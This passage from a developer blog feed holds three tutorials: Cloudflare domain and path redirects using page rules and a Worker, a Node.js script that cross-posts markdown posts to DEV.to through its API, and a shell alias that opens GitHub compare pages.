scenarios where you may need to redirect visitors to another domain/url and how you can implement such redirection with Cloudflare.</p> <p>The answer to all of the scenarios is either Page Rules or Workers. Note both require the domain where you forward from to be proxied by Cloudflare (orange cloud enabled on the DNS tab). </p> <p>You can have up to 3 page rules and process up to 100k requests/day with the Cloudflare Free plan.</p> <h2> Redirect all traffic for <code>source.com</code> to <code>target.com</code> </h2> <p>Make sure there's a proxied DNS record for the root <code>@</code> on the DNS tab of <code>source.com</code>. If missing, create one. <em>Target</em> can be anything, since forwarding page rule will execute before target is evaluated.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--xyJWGsx3--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/domain-and-path-redirects-with-cloudflare/create-dns-record-for-source-domain.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--xyJWGsx3--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/domain-and-path-redirects-with-cloudflare/create-dns-record-for-source-domain.webp" alt="Create DNS record for source domain"></a></p> <p>Create the redirect page rule. Set relevant HTTP redirection code:</p> <ul> <li> <code>302</code> if it's a temporary setup and source.com will start serving traffic directly in future</li> <li> <code>301</code> if forwarding is permanent and you expect source domain to be always used to redirect visitors</li> </ul> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--89jrVDbS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/domain-and-path-redirects-with-cloudflare/redirect-domains-with-cloudflare.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--89jrVDbS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/domain-and-path-redirects-with-cloudflare/redirect-domains-with-cloudflare.webp" alt="Redirect domain page rule"></a></p> <p>What if you want to preserve the path during forwarding, i.e. <code>source.com/login</code> must redirect to <code>target.com/login</code>?<br> In the <em>Destination URL</em> field of the page rule, append <code>$1</code> (value matched from the source), so that it reads <code>https://target.com/$1</code>.</p> <h2> Redirect non-www to www </h2> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--vawjNIUm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/domain-and-path-redirects-with-cloudflare/non-www-to-www.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--vawjNIUm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/domain-and-path-redirects-with-cloudflare/non-www-to-www.webp" alt="Redirect non-www to www"></a></p> <h2> Redirect www to non-www </h2> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--1SM79K9j--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/domain-and-path-redirects-with-cloudflare/www-to-non-www.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--1SM79K9j--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/domain-and-path-redirects-with-cloudflare/www-to-non-www.webp" alt="Redirect www to non-www"></a></p> <h2> Redirect specific path to a URL </h2> <p>You may want to make a nice short link at your root domain forwarding to some file you want to share. <br> Consider <code>mycompany.com/deck</code> pointing to a downloadable pdf file to share with investors.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--FL9QCiNF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/domain-and-path-redirects-with-cloudflare/path-redirect-with-cloudflare.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--FL9QCiNF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/domain-and-path-redirects-with-cloudflare/path-redirect-with-cloudflare.webp" alt="Path redirect with Cloudflare"></a></p> <h2> Redirect paths to subdomains </h2> <p>Let's say there's a requirement to redirect country/locale codes in in paths to subdomains:</p> <p><code>https://mycompany.com/fr</code> → <code>https://fr.mycompany.com</code><br> <code>https://mycompany.com/de/some-page</code> → <code>https://de.mycompany.com/some-page</code><br> ...<br> but <code>https://mycompany.com/en</code> → <code>https://mycompany.com</code></p> <p>Page rules is not flexible enough to handle this scenario. Cloudflare Workers to the rescue!</p> <p>Go to the <em>Workers</em> tab → <em>Manage Workers</em> → <em>Create a Worker</em></p> <p>Create a basic worker that will parse the path, see if it's a country code, rewrite and redirect the URL if needed.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">redirectHttpCode</span> <span class="o">=</span> <span class="mi">301</span> <span class="nx">addEventListener</span><span class="p">(</span><span class="dl">'</span><span class="s1">fetch</span><span class="dl">'</span><span class="p">,</span> <span class="nx">event</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">event</span><span class="p">.</span><span class="nx">respondWith</span><span class="p">(</span><span class="nx">handleRequest</span><span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">request</span><span class="p">))</span> <span class="p">})</span> <span class="cm">/** * Respond to the request * @param {Request} request */</span> <span class="k">async</span> <span class="kd">function</span> <span class="nx">handleRequest</span><span class="p">(</span><span class="nx">request</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">URL</span><span class="p">(</span><span class="nx">request</span><span class="p">.</span><span class="nx">url</span><span class="p">)</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">pathname</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">url</span> <span class="kd">const</span> <span class="nx">pathParts</span> <span class="o">=</span> <span class="nx">pathname</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">'</span><span class="s1">/</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">pathPrefix</span> <span class="o">=</span> <span class="nx">pathParts</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="k">if</span> <span class="p">(</span><span class="nx">pathPrefix</span><span class="p">.</span><span class="nx">length</span> <span class="o">===</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// country code, you may want to do an inclusion check instead</span> <span class="k">if</span> <span class="p">(</span><span class="nx">pathPrefix</span> <span class="o">!==</span> <span class="dl">'</span><span class="s1">en</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="nx">url</span><span class="p">.</span><span class="nx">host</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">pathPrefix</span><span class="p">}</span><span class="s2">.</span><span class="p">${</span><span class="nx">url</span><span class="p">.</span><span class="nx">host</span><span class="p">}</span><span class="s2">`</span> <span class="c1">// prepend subdomain</span> <span class="p">}</span> <span class="nx">pathParts</span><span class="p">.</span><span class="nx">splice</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="c1">// remove country code from path</span> <span class="nx">url</span><span class="p">.</span><span class="nx">pathname</span> <span class="o">=</span> <span class="nx">pathParts</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="dl">'</span><span class="s1">/</span><span class="dl">'</span><span class="p">)</span> <span class="k">return</span> <span class="nx">Response</span><span class="p">.</span><span class="nx">redirect</span><span class="p">(</span><span class="nx">url</span><span class="p">.</span><span class="nx">toString</span><span class="p">(),</span> <span class="nx">redirectHttpCode</span><span class="p">)</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">fetch</span><span class="p">(</span><span class="nx">request</span><span class="p">)</span> <span class="c1">// by default proxy request as usual</span> <span class="p">}</span> </code></pre> </div> <p>Go back to the <em>Workers</em> tab → <em>Add route</em>. <br> Set <em>Route</em> to <code>mycompany.com/*</code>. Select the worker you created in previous step. <em>Save</em>.</p> <p>In less than a minute, you can confirm forwarding scenarios work as expected.</p> <h2> ... </h2> <p>Forwarding URL page rule covers basic use cases. If you need to apply custom logic with advanced mapping and url replacements, Cloudflare Workers should be used instead.</p> <p><em>If you like this type of content you can <a href="https://twitter.com/max_v_i">follow me</a> on Twitter for the latest updates.</em></p> cloudflare cloudflareworkers seo webdev Cross-post from your blog to DEV.to (Node.js script) Max Ivanov Sat, 13 Feb 2021 15:00:46 +0000 https://forem.com/maxivanov/cross-post-from-your-blog-to-dev-to-node-js-script-59j4 https://forem.com/maxivanov/cross-post-from-your-blog-to-dev-to-node-js-script-59j4 <p><a href="https://dev.to/">DEV.to</a> is a great place for a technical blog. The website feels lightweight and easy to navigate and the community is welcoming. <br> Still, you may want to publish your content under your own domain first which you have full control of. You then may want to cross-post to DEV with a link to the canonical URL.</p> <p>When I started writing initially my workflow was like this:</p> <ul> <li>Write a blog post in the comfort of my text editor locally</li> <li>Publish to my personal blog</li> <li>Cross-post to DEV manually</li> </ul> <p>Last part definitely called for automation. There's a way to <em>Publish from RSS</em> but I realized some tweaks had to be made to the content before it could be published on DEV.</p> <p>Another approach is to use the DEV API. My blog is built with <a href="https://www.11ty.dev/">Eleventy</a> and I've added a little helper npm script to help with cross-posting. It loads a blog post from the markdown file, publishes a draft at DEV and returns a URL of the draft. There you can make sure it looks alright (occasionally I may need to adjust tags) and hit <em>Publish</em>.</p> <p>Workflow now looks like this:</p> <ul> <li>Write a blog post in the comfort of my text editor locally</li> <li>Publish to my personal blog</li> <li>Run <code>npm run &lt;path-to-md-file&gt;</code> → follow the draft link to review → <em>Publish</em> </li> </ul> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ic65sYjx--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/cross-post-to-dev-with-nodejs/cross-post-npm-script.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ic65sYjx--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/cross-post-to-dev-with-nodejs/cross-post-npm-script.webp" alt="Cross-post to DEV.to with Node.js script"></a></p> <p>If it sounds useful, below is a (beginner-friendly) guide of how to add such script to your own blog.</p> <h2> Create a DEV API key </h2> <p>In your DEV profile, go to <em>Settings</em> → <em>Account</em> → <em>DEV Community API Keys</em></p> <p>Give the key a name (e.g. <code>publish-to-dev</code>) and generate it.</p> <p>Copy the key and put it in the <code>.env</code> file in the root of your blog. Make sure this file is listed in <code>.gitignore</code> as we don't want secrets to land in a git repository.</p> <p><em>.env</em><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>DEV_TO_API_KEY=your-api-key </code></pre> </div> <h2> npm script to publish to DEV </h2> <p>If not installed, you will need to add these packages to dev dependencies:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npm i <span class="nt">--save-dev</span> dotenv gray-matter node-fetch </code></pre> </div> <p><em>You can find the entire script here: <a href="https://github.com/maximivanov/maxivanov.io/blob/main/scripts/publish-to-devto.js">https://github.com/maximivanov/maxivanov.io/blob/main/scripts/publish-to-devto.js</a></em> </p> <p>To start, we load the <code>.env</code> file, include dependencies and configure some settings.</p> <p><em>./scripts/publish-to-devto.js</em><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">dotenv</span><span class="dl">'</span><span class="p">).</span><span class="nx">config</span><span class="p">()</span> <span class="c1">// make the API key available as an environment variable</span> <span class="kd">const</span> <span class="nx">matter</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">gray-matter</span><span class="dl">'</span><span class="p">)</span> <span class="c1">// library to parse front-matter and content from posts' markdown files</span> <span class="kd">const</span> <span class="nx">fetch</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">node-fetch</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">apiKey</span> <span class="o">=</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">DEV_TO_API_KEY</span> <span class="kd">const</span> <span class="nx">apiUrl</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">https://dev.to/api/articles</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">siteUrl</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">https://www.maxivanov.io</span><span class="dl">'</span> <span class="c1">// hostname of the blog</span> <span class="kd">const</span> <span class="nx">autoPublish</span> <span class="o">=</span> <span class="kc">false</span> <span class="c1">// whether we want to publish or create drafts</span> </code></pre> </div> <p>Main body of the script, which fetches the data, sends the API request and prints the draft URL:</p> <p><em>./scripts/publish-to-devto.js</em><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="p">...</span> <span class="p">;(</span><span class="k">async</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">process</span><span class="p">.</span><span class="nx">argv</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mi">2</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="c1">// read file name from command line arguments</span> <span class="kd">const</span> <span class="nx">file</span> <span class="o">=</span> <span class="nx">matter</span><span class="p">.</span><span class="nx">read</span><span class="p">(</span><span class="nx">path</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">payload</span> <span class="o">=</span> <span class="nx">getPayload</span><span class="p">(</span><span class="nx">file</span><span class="p">)</span> <span class="c1">// get payload to publish to DEV API (see below)</span> <span class="kd">const</span> <span class="nx">article</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">publish</span><span class="p">(</span><span class="nx">payload</span><span class="p">)</span> <span class="k">if</span> <span class="p">(</span><span class="nx">autoPublish</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">`Article published: </span><span class="p">${</span><span class="nx">article</span><span class="p">.</span><span class="nx">url</span><span class="p">}</span><span class="s2">`</span><span class="p">)</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">`Article draft created: </span><span class="p">${</span><span class="nx">article</span><span class="p">.</span><span class="nx">url</span><span class="p">}</span><span class="s2">/edit`</span><span class="p">)</span> <span class="p">}</span> <span class="p">})()</span> </code></pre> </div> <p>Function to prepare data to post to the API:</p> <p><em>./scripts/publish-to-devto.js</em><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="p">...</span> <span class="kd">function</span> <span class="nx">getPayload</span><span class="p">(</span><span class="nx">file</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="p">{</span> <span class="na">article</span><span class="p">:</span> <span class="p">{</span> <span class="na">title</span><span class="p">:</span> <span class="nx">file</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">title</span><span class="p">.</span><span class="nx">trim</span><span class="p">(),</span> <span class="c1">// replace relative paths with absolute URLs</span> <span class="na">body_markdown</span><span class="p">:</span> <span class="nx">file</span><span class="p">.</span><span class="nx">content</span><span class="p">.</span><span class="nx">trim</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">\]\(\/</span><span class="sr">posts</span><span class="se">\/</span><span class="sr">/gm</span><span class="p">,</span> <span class="s2">`](</span><span class="p">${</span><span class="nx">siteUrl</span><span class="p">}</span><span class="s2">/posts/`</span><span class="p">),</span> <span class="na">published</span><span class="p">:</span> <span class="nx">autoPublish</span><span class="p">,</span> <span class="c1">// if you want blog post to be a part of Series on DEV</span> <span class="na">series</span><span class="p">:</span> <span class="kc">undefined</span><span class="p">,</span> <span class="c1">// cover image URL</span> <span class="na">main_image</span><span class="p">:</span> <span class="nx">file</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">image</span> <span class="p">?</span> <span class="s2">`</span><span class="p">${</span><span class="nx">siteUrl</span><span class="p">}${</span><span class="nx">file</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">image</span><span class="p">}</span><span class="s2">`</span> <span class="p">:</span> <span class="kc">undefined</span><span class="p">,</span> <span class="c1">// generate the canonical url (file name minus .md in my case)</span> <span class="na">canonical_url</span><span class="p">:</span> <span class="s2">`</span><span class="p">${</span><span class="nx">siteUrl</span><span class="p">}</span><span class="s2">/</span><span class="p">${</span><span class="nx">file</span><span class="p">.</span><span class="nx">path</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">'</span><span class="s1">/</span><span class="dl">'</span><span class="p">).</span><span class="nx">slice</span><span class="p">(</span><span class="o">-</span><span class="mi">2</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">)[</span><span class="mi">0</span><span class="p">]}</span><span class="s2">`</span><span class="p">,</span> <span class="na">description</span><span class="p">:</span> <span class="nx">file</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">description</span><span class="p">,</span> <span class="c1">// DEV allows only 4 tags and they must be alphanumeric</span> <span class="na">tags</span><span class="p">:</span> <span class="nx">file</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">tags</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">4</span><span class="p">).</span><span class="nx">map</span><span class="p">(</span><span class="nx">tag</span> <span class="o">=&gt;</span> <span class="nx">tag</span><span class="p">.</span><span class="nx">toLowerCase</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">[^</span><span class="sr">a-z0-9</span><span class="se">]</span><span class="sr">/i</span><span class="p">,</span> <span class="dl">''</span><span class="p">)),</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>And finally a function to publish the prepared payload to the API:</p> <p><em>./scripts/publish-to-devto.js</em><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="p">...</span> <span class="k">async</span> <span class="kd">function</span> <span class="nx">publish</span><span class="p">(</span><span class="nx">payload</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">fetch</span><span class="p">(</span><span class="nx">apiUrl</span><span class="p">,</span> <span class="p">{</span> <span class="na">method</span><span class="p">:</span> <span class="dl">'</span><span class="s1">post</span><span class="dl">'</span><span class="p">,</span> <span class="na">body</span><span class="p">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">payload</span><span class="p">),</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span><span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/json</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">api-key</span><span class="dl">'</span><span class="p">:</span> <span class="nx">apiKey</span><span class="p">}</span> <span class="p">});</span> <span class="kd">const</span> <span class="nx">json</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nx">json</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span><span class="nx">json</span><span class="p">.</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nb">Error</span><span class="p">(</span><span class="s2">`API returned an error: </span><span class="p">${</span><span class="nx">json</span><span class="p">.</span><span class="nx">error</span><span class="p">}</span><span class="s2">`</span><span class="p">)</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">json</span> <span class="p">}</span> </code></pre> </div> <p>Add a new script to the <code>package.json</code>:</p> <p><em>./package.json</em><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="err">...</span><span class="w"> </span><span class="nl">"scripts"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="err">...</span><span class="w"> </span><span class="nl">"publish-to-devto"</span><span class="p">:</span><span class="w"> </span><span class="s2">"node ./scripts/publish-to-devto.js"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>And call it from the command line:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npm run publish-to-devto posts/2021/01/add-docker-container-name-to-shell-prompt.md </code></pre> </div> <h2> ... </h2> <p>Alright! We just got rid of some boring manual work which is always good.</p> node productivity webdev javascript Shell alias to open git diffs in Github Max Ivanov Fri, 05 Feb 2021 14:16:26 +0000 https://forem.com/maxivanov/shell-alias-to-open-git-diffs-in-github-443i https://forem.com/maxivanov/shell-alias-to-open-git-diffs-in-github-443i <p>You're viewing a project's code on your machine, and the code is hosted in Github. Imagine couple scenarios: </p> <ol> <li>You stumble upon a branch you don't recognize. You want to see how does this branch differ from the primary <code>main</code> branch.</li> <li>You're about to merge a branch into your <code>main</code> branch without making a pull request. Once again you want to see the changes before merging.</li> </ol> <p>The answer to both scenarios is <code>git diff</code>. <br> I'm not sure about you, but I find viewing larger diffs (even colored ones) in terminal somewhat cumbersome.<br> There are GUI tools, like what we have in VSCode, but it takes time to click through menus to get to the correct screen and find relevant branches so it never sticked with me.</p> <p>What I find awesome for viewing diffs is Github Compare page. </p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--yKqIj8mK--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/shell-alias-to-view-diffs-in-github/compare-page.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--yKqIj8mK--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/02/shell-alias-to-view-diffs-in-github/compare-page.webp" alt="Github compare page"></a></p> <p>It's familiar, well organized and useful. Whenever I can, I prefer to view my git diffs there.<br> Crafting a url to get to the compare page is boring though.</p> <p>Below is a quick tip on how to add a console alias to open the Github diff page to see changes between 2 branches or commits:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> ghcmp main my-feature-branch <span class="c"># opens a browser window with Github compare of "main" and "my-feature-branch"</span> </code></pre> </div> <h2> Prerequisites </h2> <p>You only need <code>git</code> installed in the environment where you want to add the alias.</p> <p>Note: you need to run the <code>ghcmp</code> command (or whatever you name the alias) in the directory with you git repository, so that it can find out the repo's Github url.</p> <p>We will see how to add the alias to <code>zsh</code> and <code>bash</code> shells on Mac and Linux.</p> <h2> Github compare page </h2> <p>Compare page url format:</p> <p><code>https://&lt;REPO URL&gt;/compare/&lt;SOURCE BRANCH OR COMMIT&gt;...&lt;TARGET BRANCH OR COMMIT&gt;</code></p> <p>Note the difference between <code>..</code> and <code>...</code> (2 and 3 dots).</p> <p>2 dots: show all commits that TARGET has but SOURCE doesn't and commits that SOURCE has but TARGET doesn't.</p> <p>3 dots: show all commits that TARGET has but SOURCE doesn't. You usually want this.</p> <p>E.g. to see what was added in the <code>0.4-stable</code> branch compared to <code>0.3-stable</code> in <code>react</code> repo:</p> <p><a href="https://github.com/facebook/react/compare/0.3-stable...0.4-stable">https://github.com/facebook/react/compare/0.3-stable...0.4-stable</a></p> <h2> Command to open diff in Github </h2> <p>Assuming alias signature is <code>ghcmp [from branch-or-commit] [to branch-or-commit]</code>, the shell command is this:</p> <p>Mac:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>open <span class="s2">"</span><span class="si">$(</span>git config <span class="nt">--get</span> remote.origin.url | <span class="nb">sed</span> <span class="nt">-E</span> <span class="s1">'s/:([^\/])/\/\1/g'</span> | <span class="nb">sed</span> <span class="nt">-e</span> <span class="s1">'s/git@/https:\/\//g'</span> | <span class="nb">sed</span> <span class="nt">-e</span> <span class="s1">'s/.git$//'</span><span class="si">)</span><span class="s2">/compare/</span><span class="nv">$1</span><span class="s2">...</span><span class="nv">$2</span><span class="s2">"</span> </code></pre> </div> <p>Linux:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>xdg-open <span class="s2">"</span><span class="si">$(</span>git config <span class="nt">--get</span> remote.origin.url | <span class="nb">sed</span> <span class="nt">-E</span> <span class="s1">'s/:([^\/])/\/\1/g'</span> | <span class="nb">sed</span> <span class="nt">-e</span> <span class="s1">'s/git@/https:\/\//g'</span> | <span class="nb">sed</span> <span class="nt">-e</span> <span class="s1">'s/.git$//'</span><span class="si">)</span><span class="s2">/compare/</span><span class="nv">$1</span><span class="s2">...</span><span class="nv">$2</span><span class="s2">"</span> </code></pre> </div> <p>Command deconstructed if you're curious:</p> <p><code>open</code> open the following url in the browser, replace with xdg-open for Linux<br> <code>"$(git config --get remote.origin.url</code> get the url of the repo from the git config file<br> <code>| sed -E 's/:([^\/])/\/\1/g' | sed -e 's/git@/https:\/\//g' | sed -e 's/.git$//')</code> convert the repo url to a canonical (https) form<br> <code>/compare/$1...$2"</code> the path in the Github compare url with 2 arguments passed</p> <p>I've adapted the sed from this <a href="https://stackoverflow.com/a/63907839/2579733">SO answer</a>.</p> <h2> Add shell alias </h2> <p>Now that we have the command, let's add the alias. It's the same for both <code>bash</code> and <code>zsh</code>, only the shell configuration file is different.</p> <p>In bash, add to the end of <code>~/.bashrc</code>. In zsh, add to the end of <code>~.zshrc</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ghcmp<span class="o">()</span> <span class="o">{</span> open <span class="s2">"</span><span class="si">$(</span>git config <span class="nt">--get</span> remote.origin.url | <span class="nb">sed</span> <span class="nt">-E</span> <span class="s1">'s/:([^\/])/\/\1/g'</span> | <span class="nb">sed</span> <span class="nt">-e</span> <span class="s1">'s/git@/https:\/\//g'</span> | <span class="nb">sed</span> <span class="nt">-e</span> <span class="s1">'s/.git$//'</span><span class="si">)</span><span class="s2">/compare/</span><span class="nv">$1</span><span class="s2">...</span><span class="nv">$2</span><span class="s2">"</span> <span class="o">}</span> </code></pre> </div> <h2> ... </h2> <p>That was a little productivity trick to simplify your daily git process a bit.</p> <p><em>If you like this type of content you can <a href="https://twitter.com/max_v_i">follow me</a> on Twitter for the latest updates.</em></p> git github productivity shell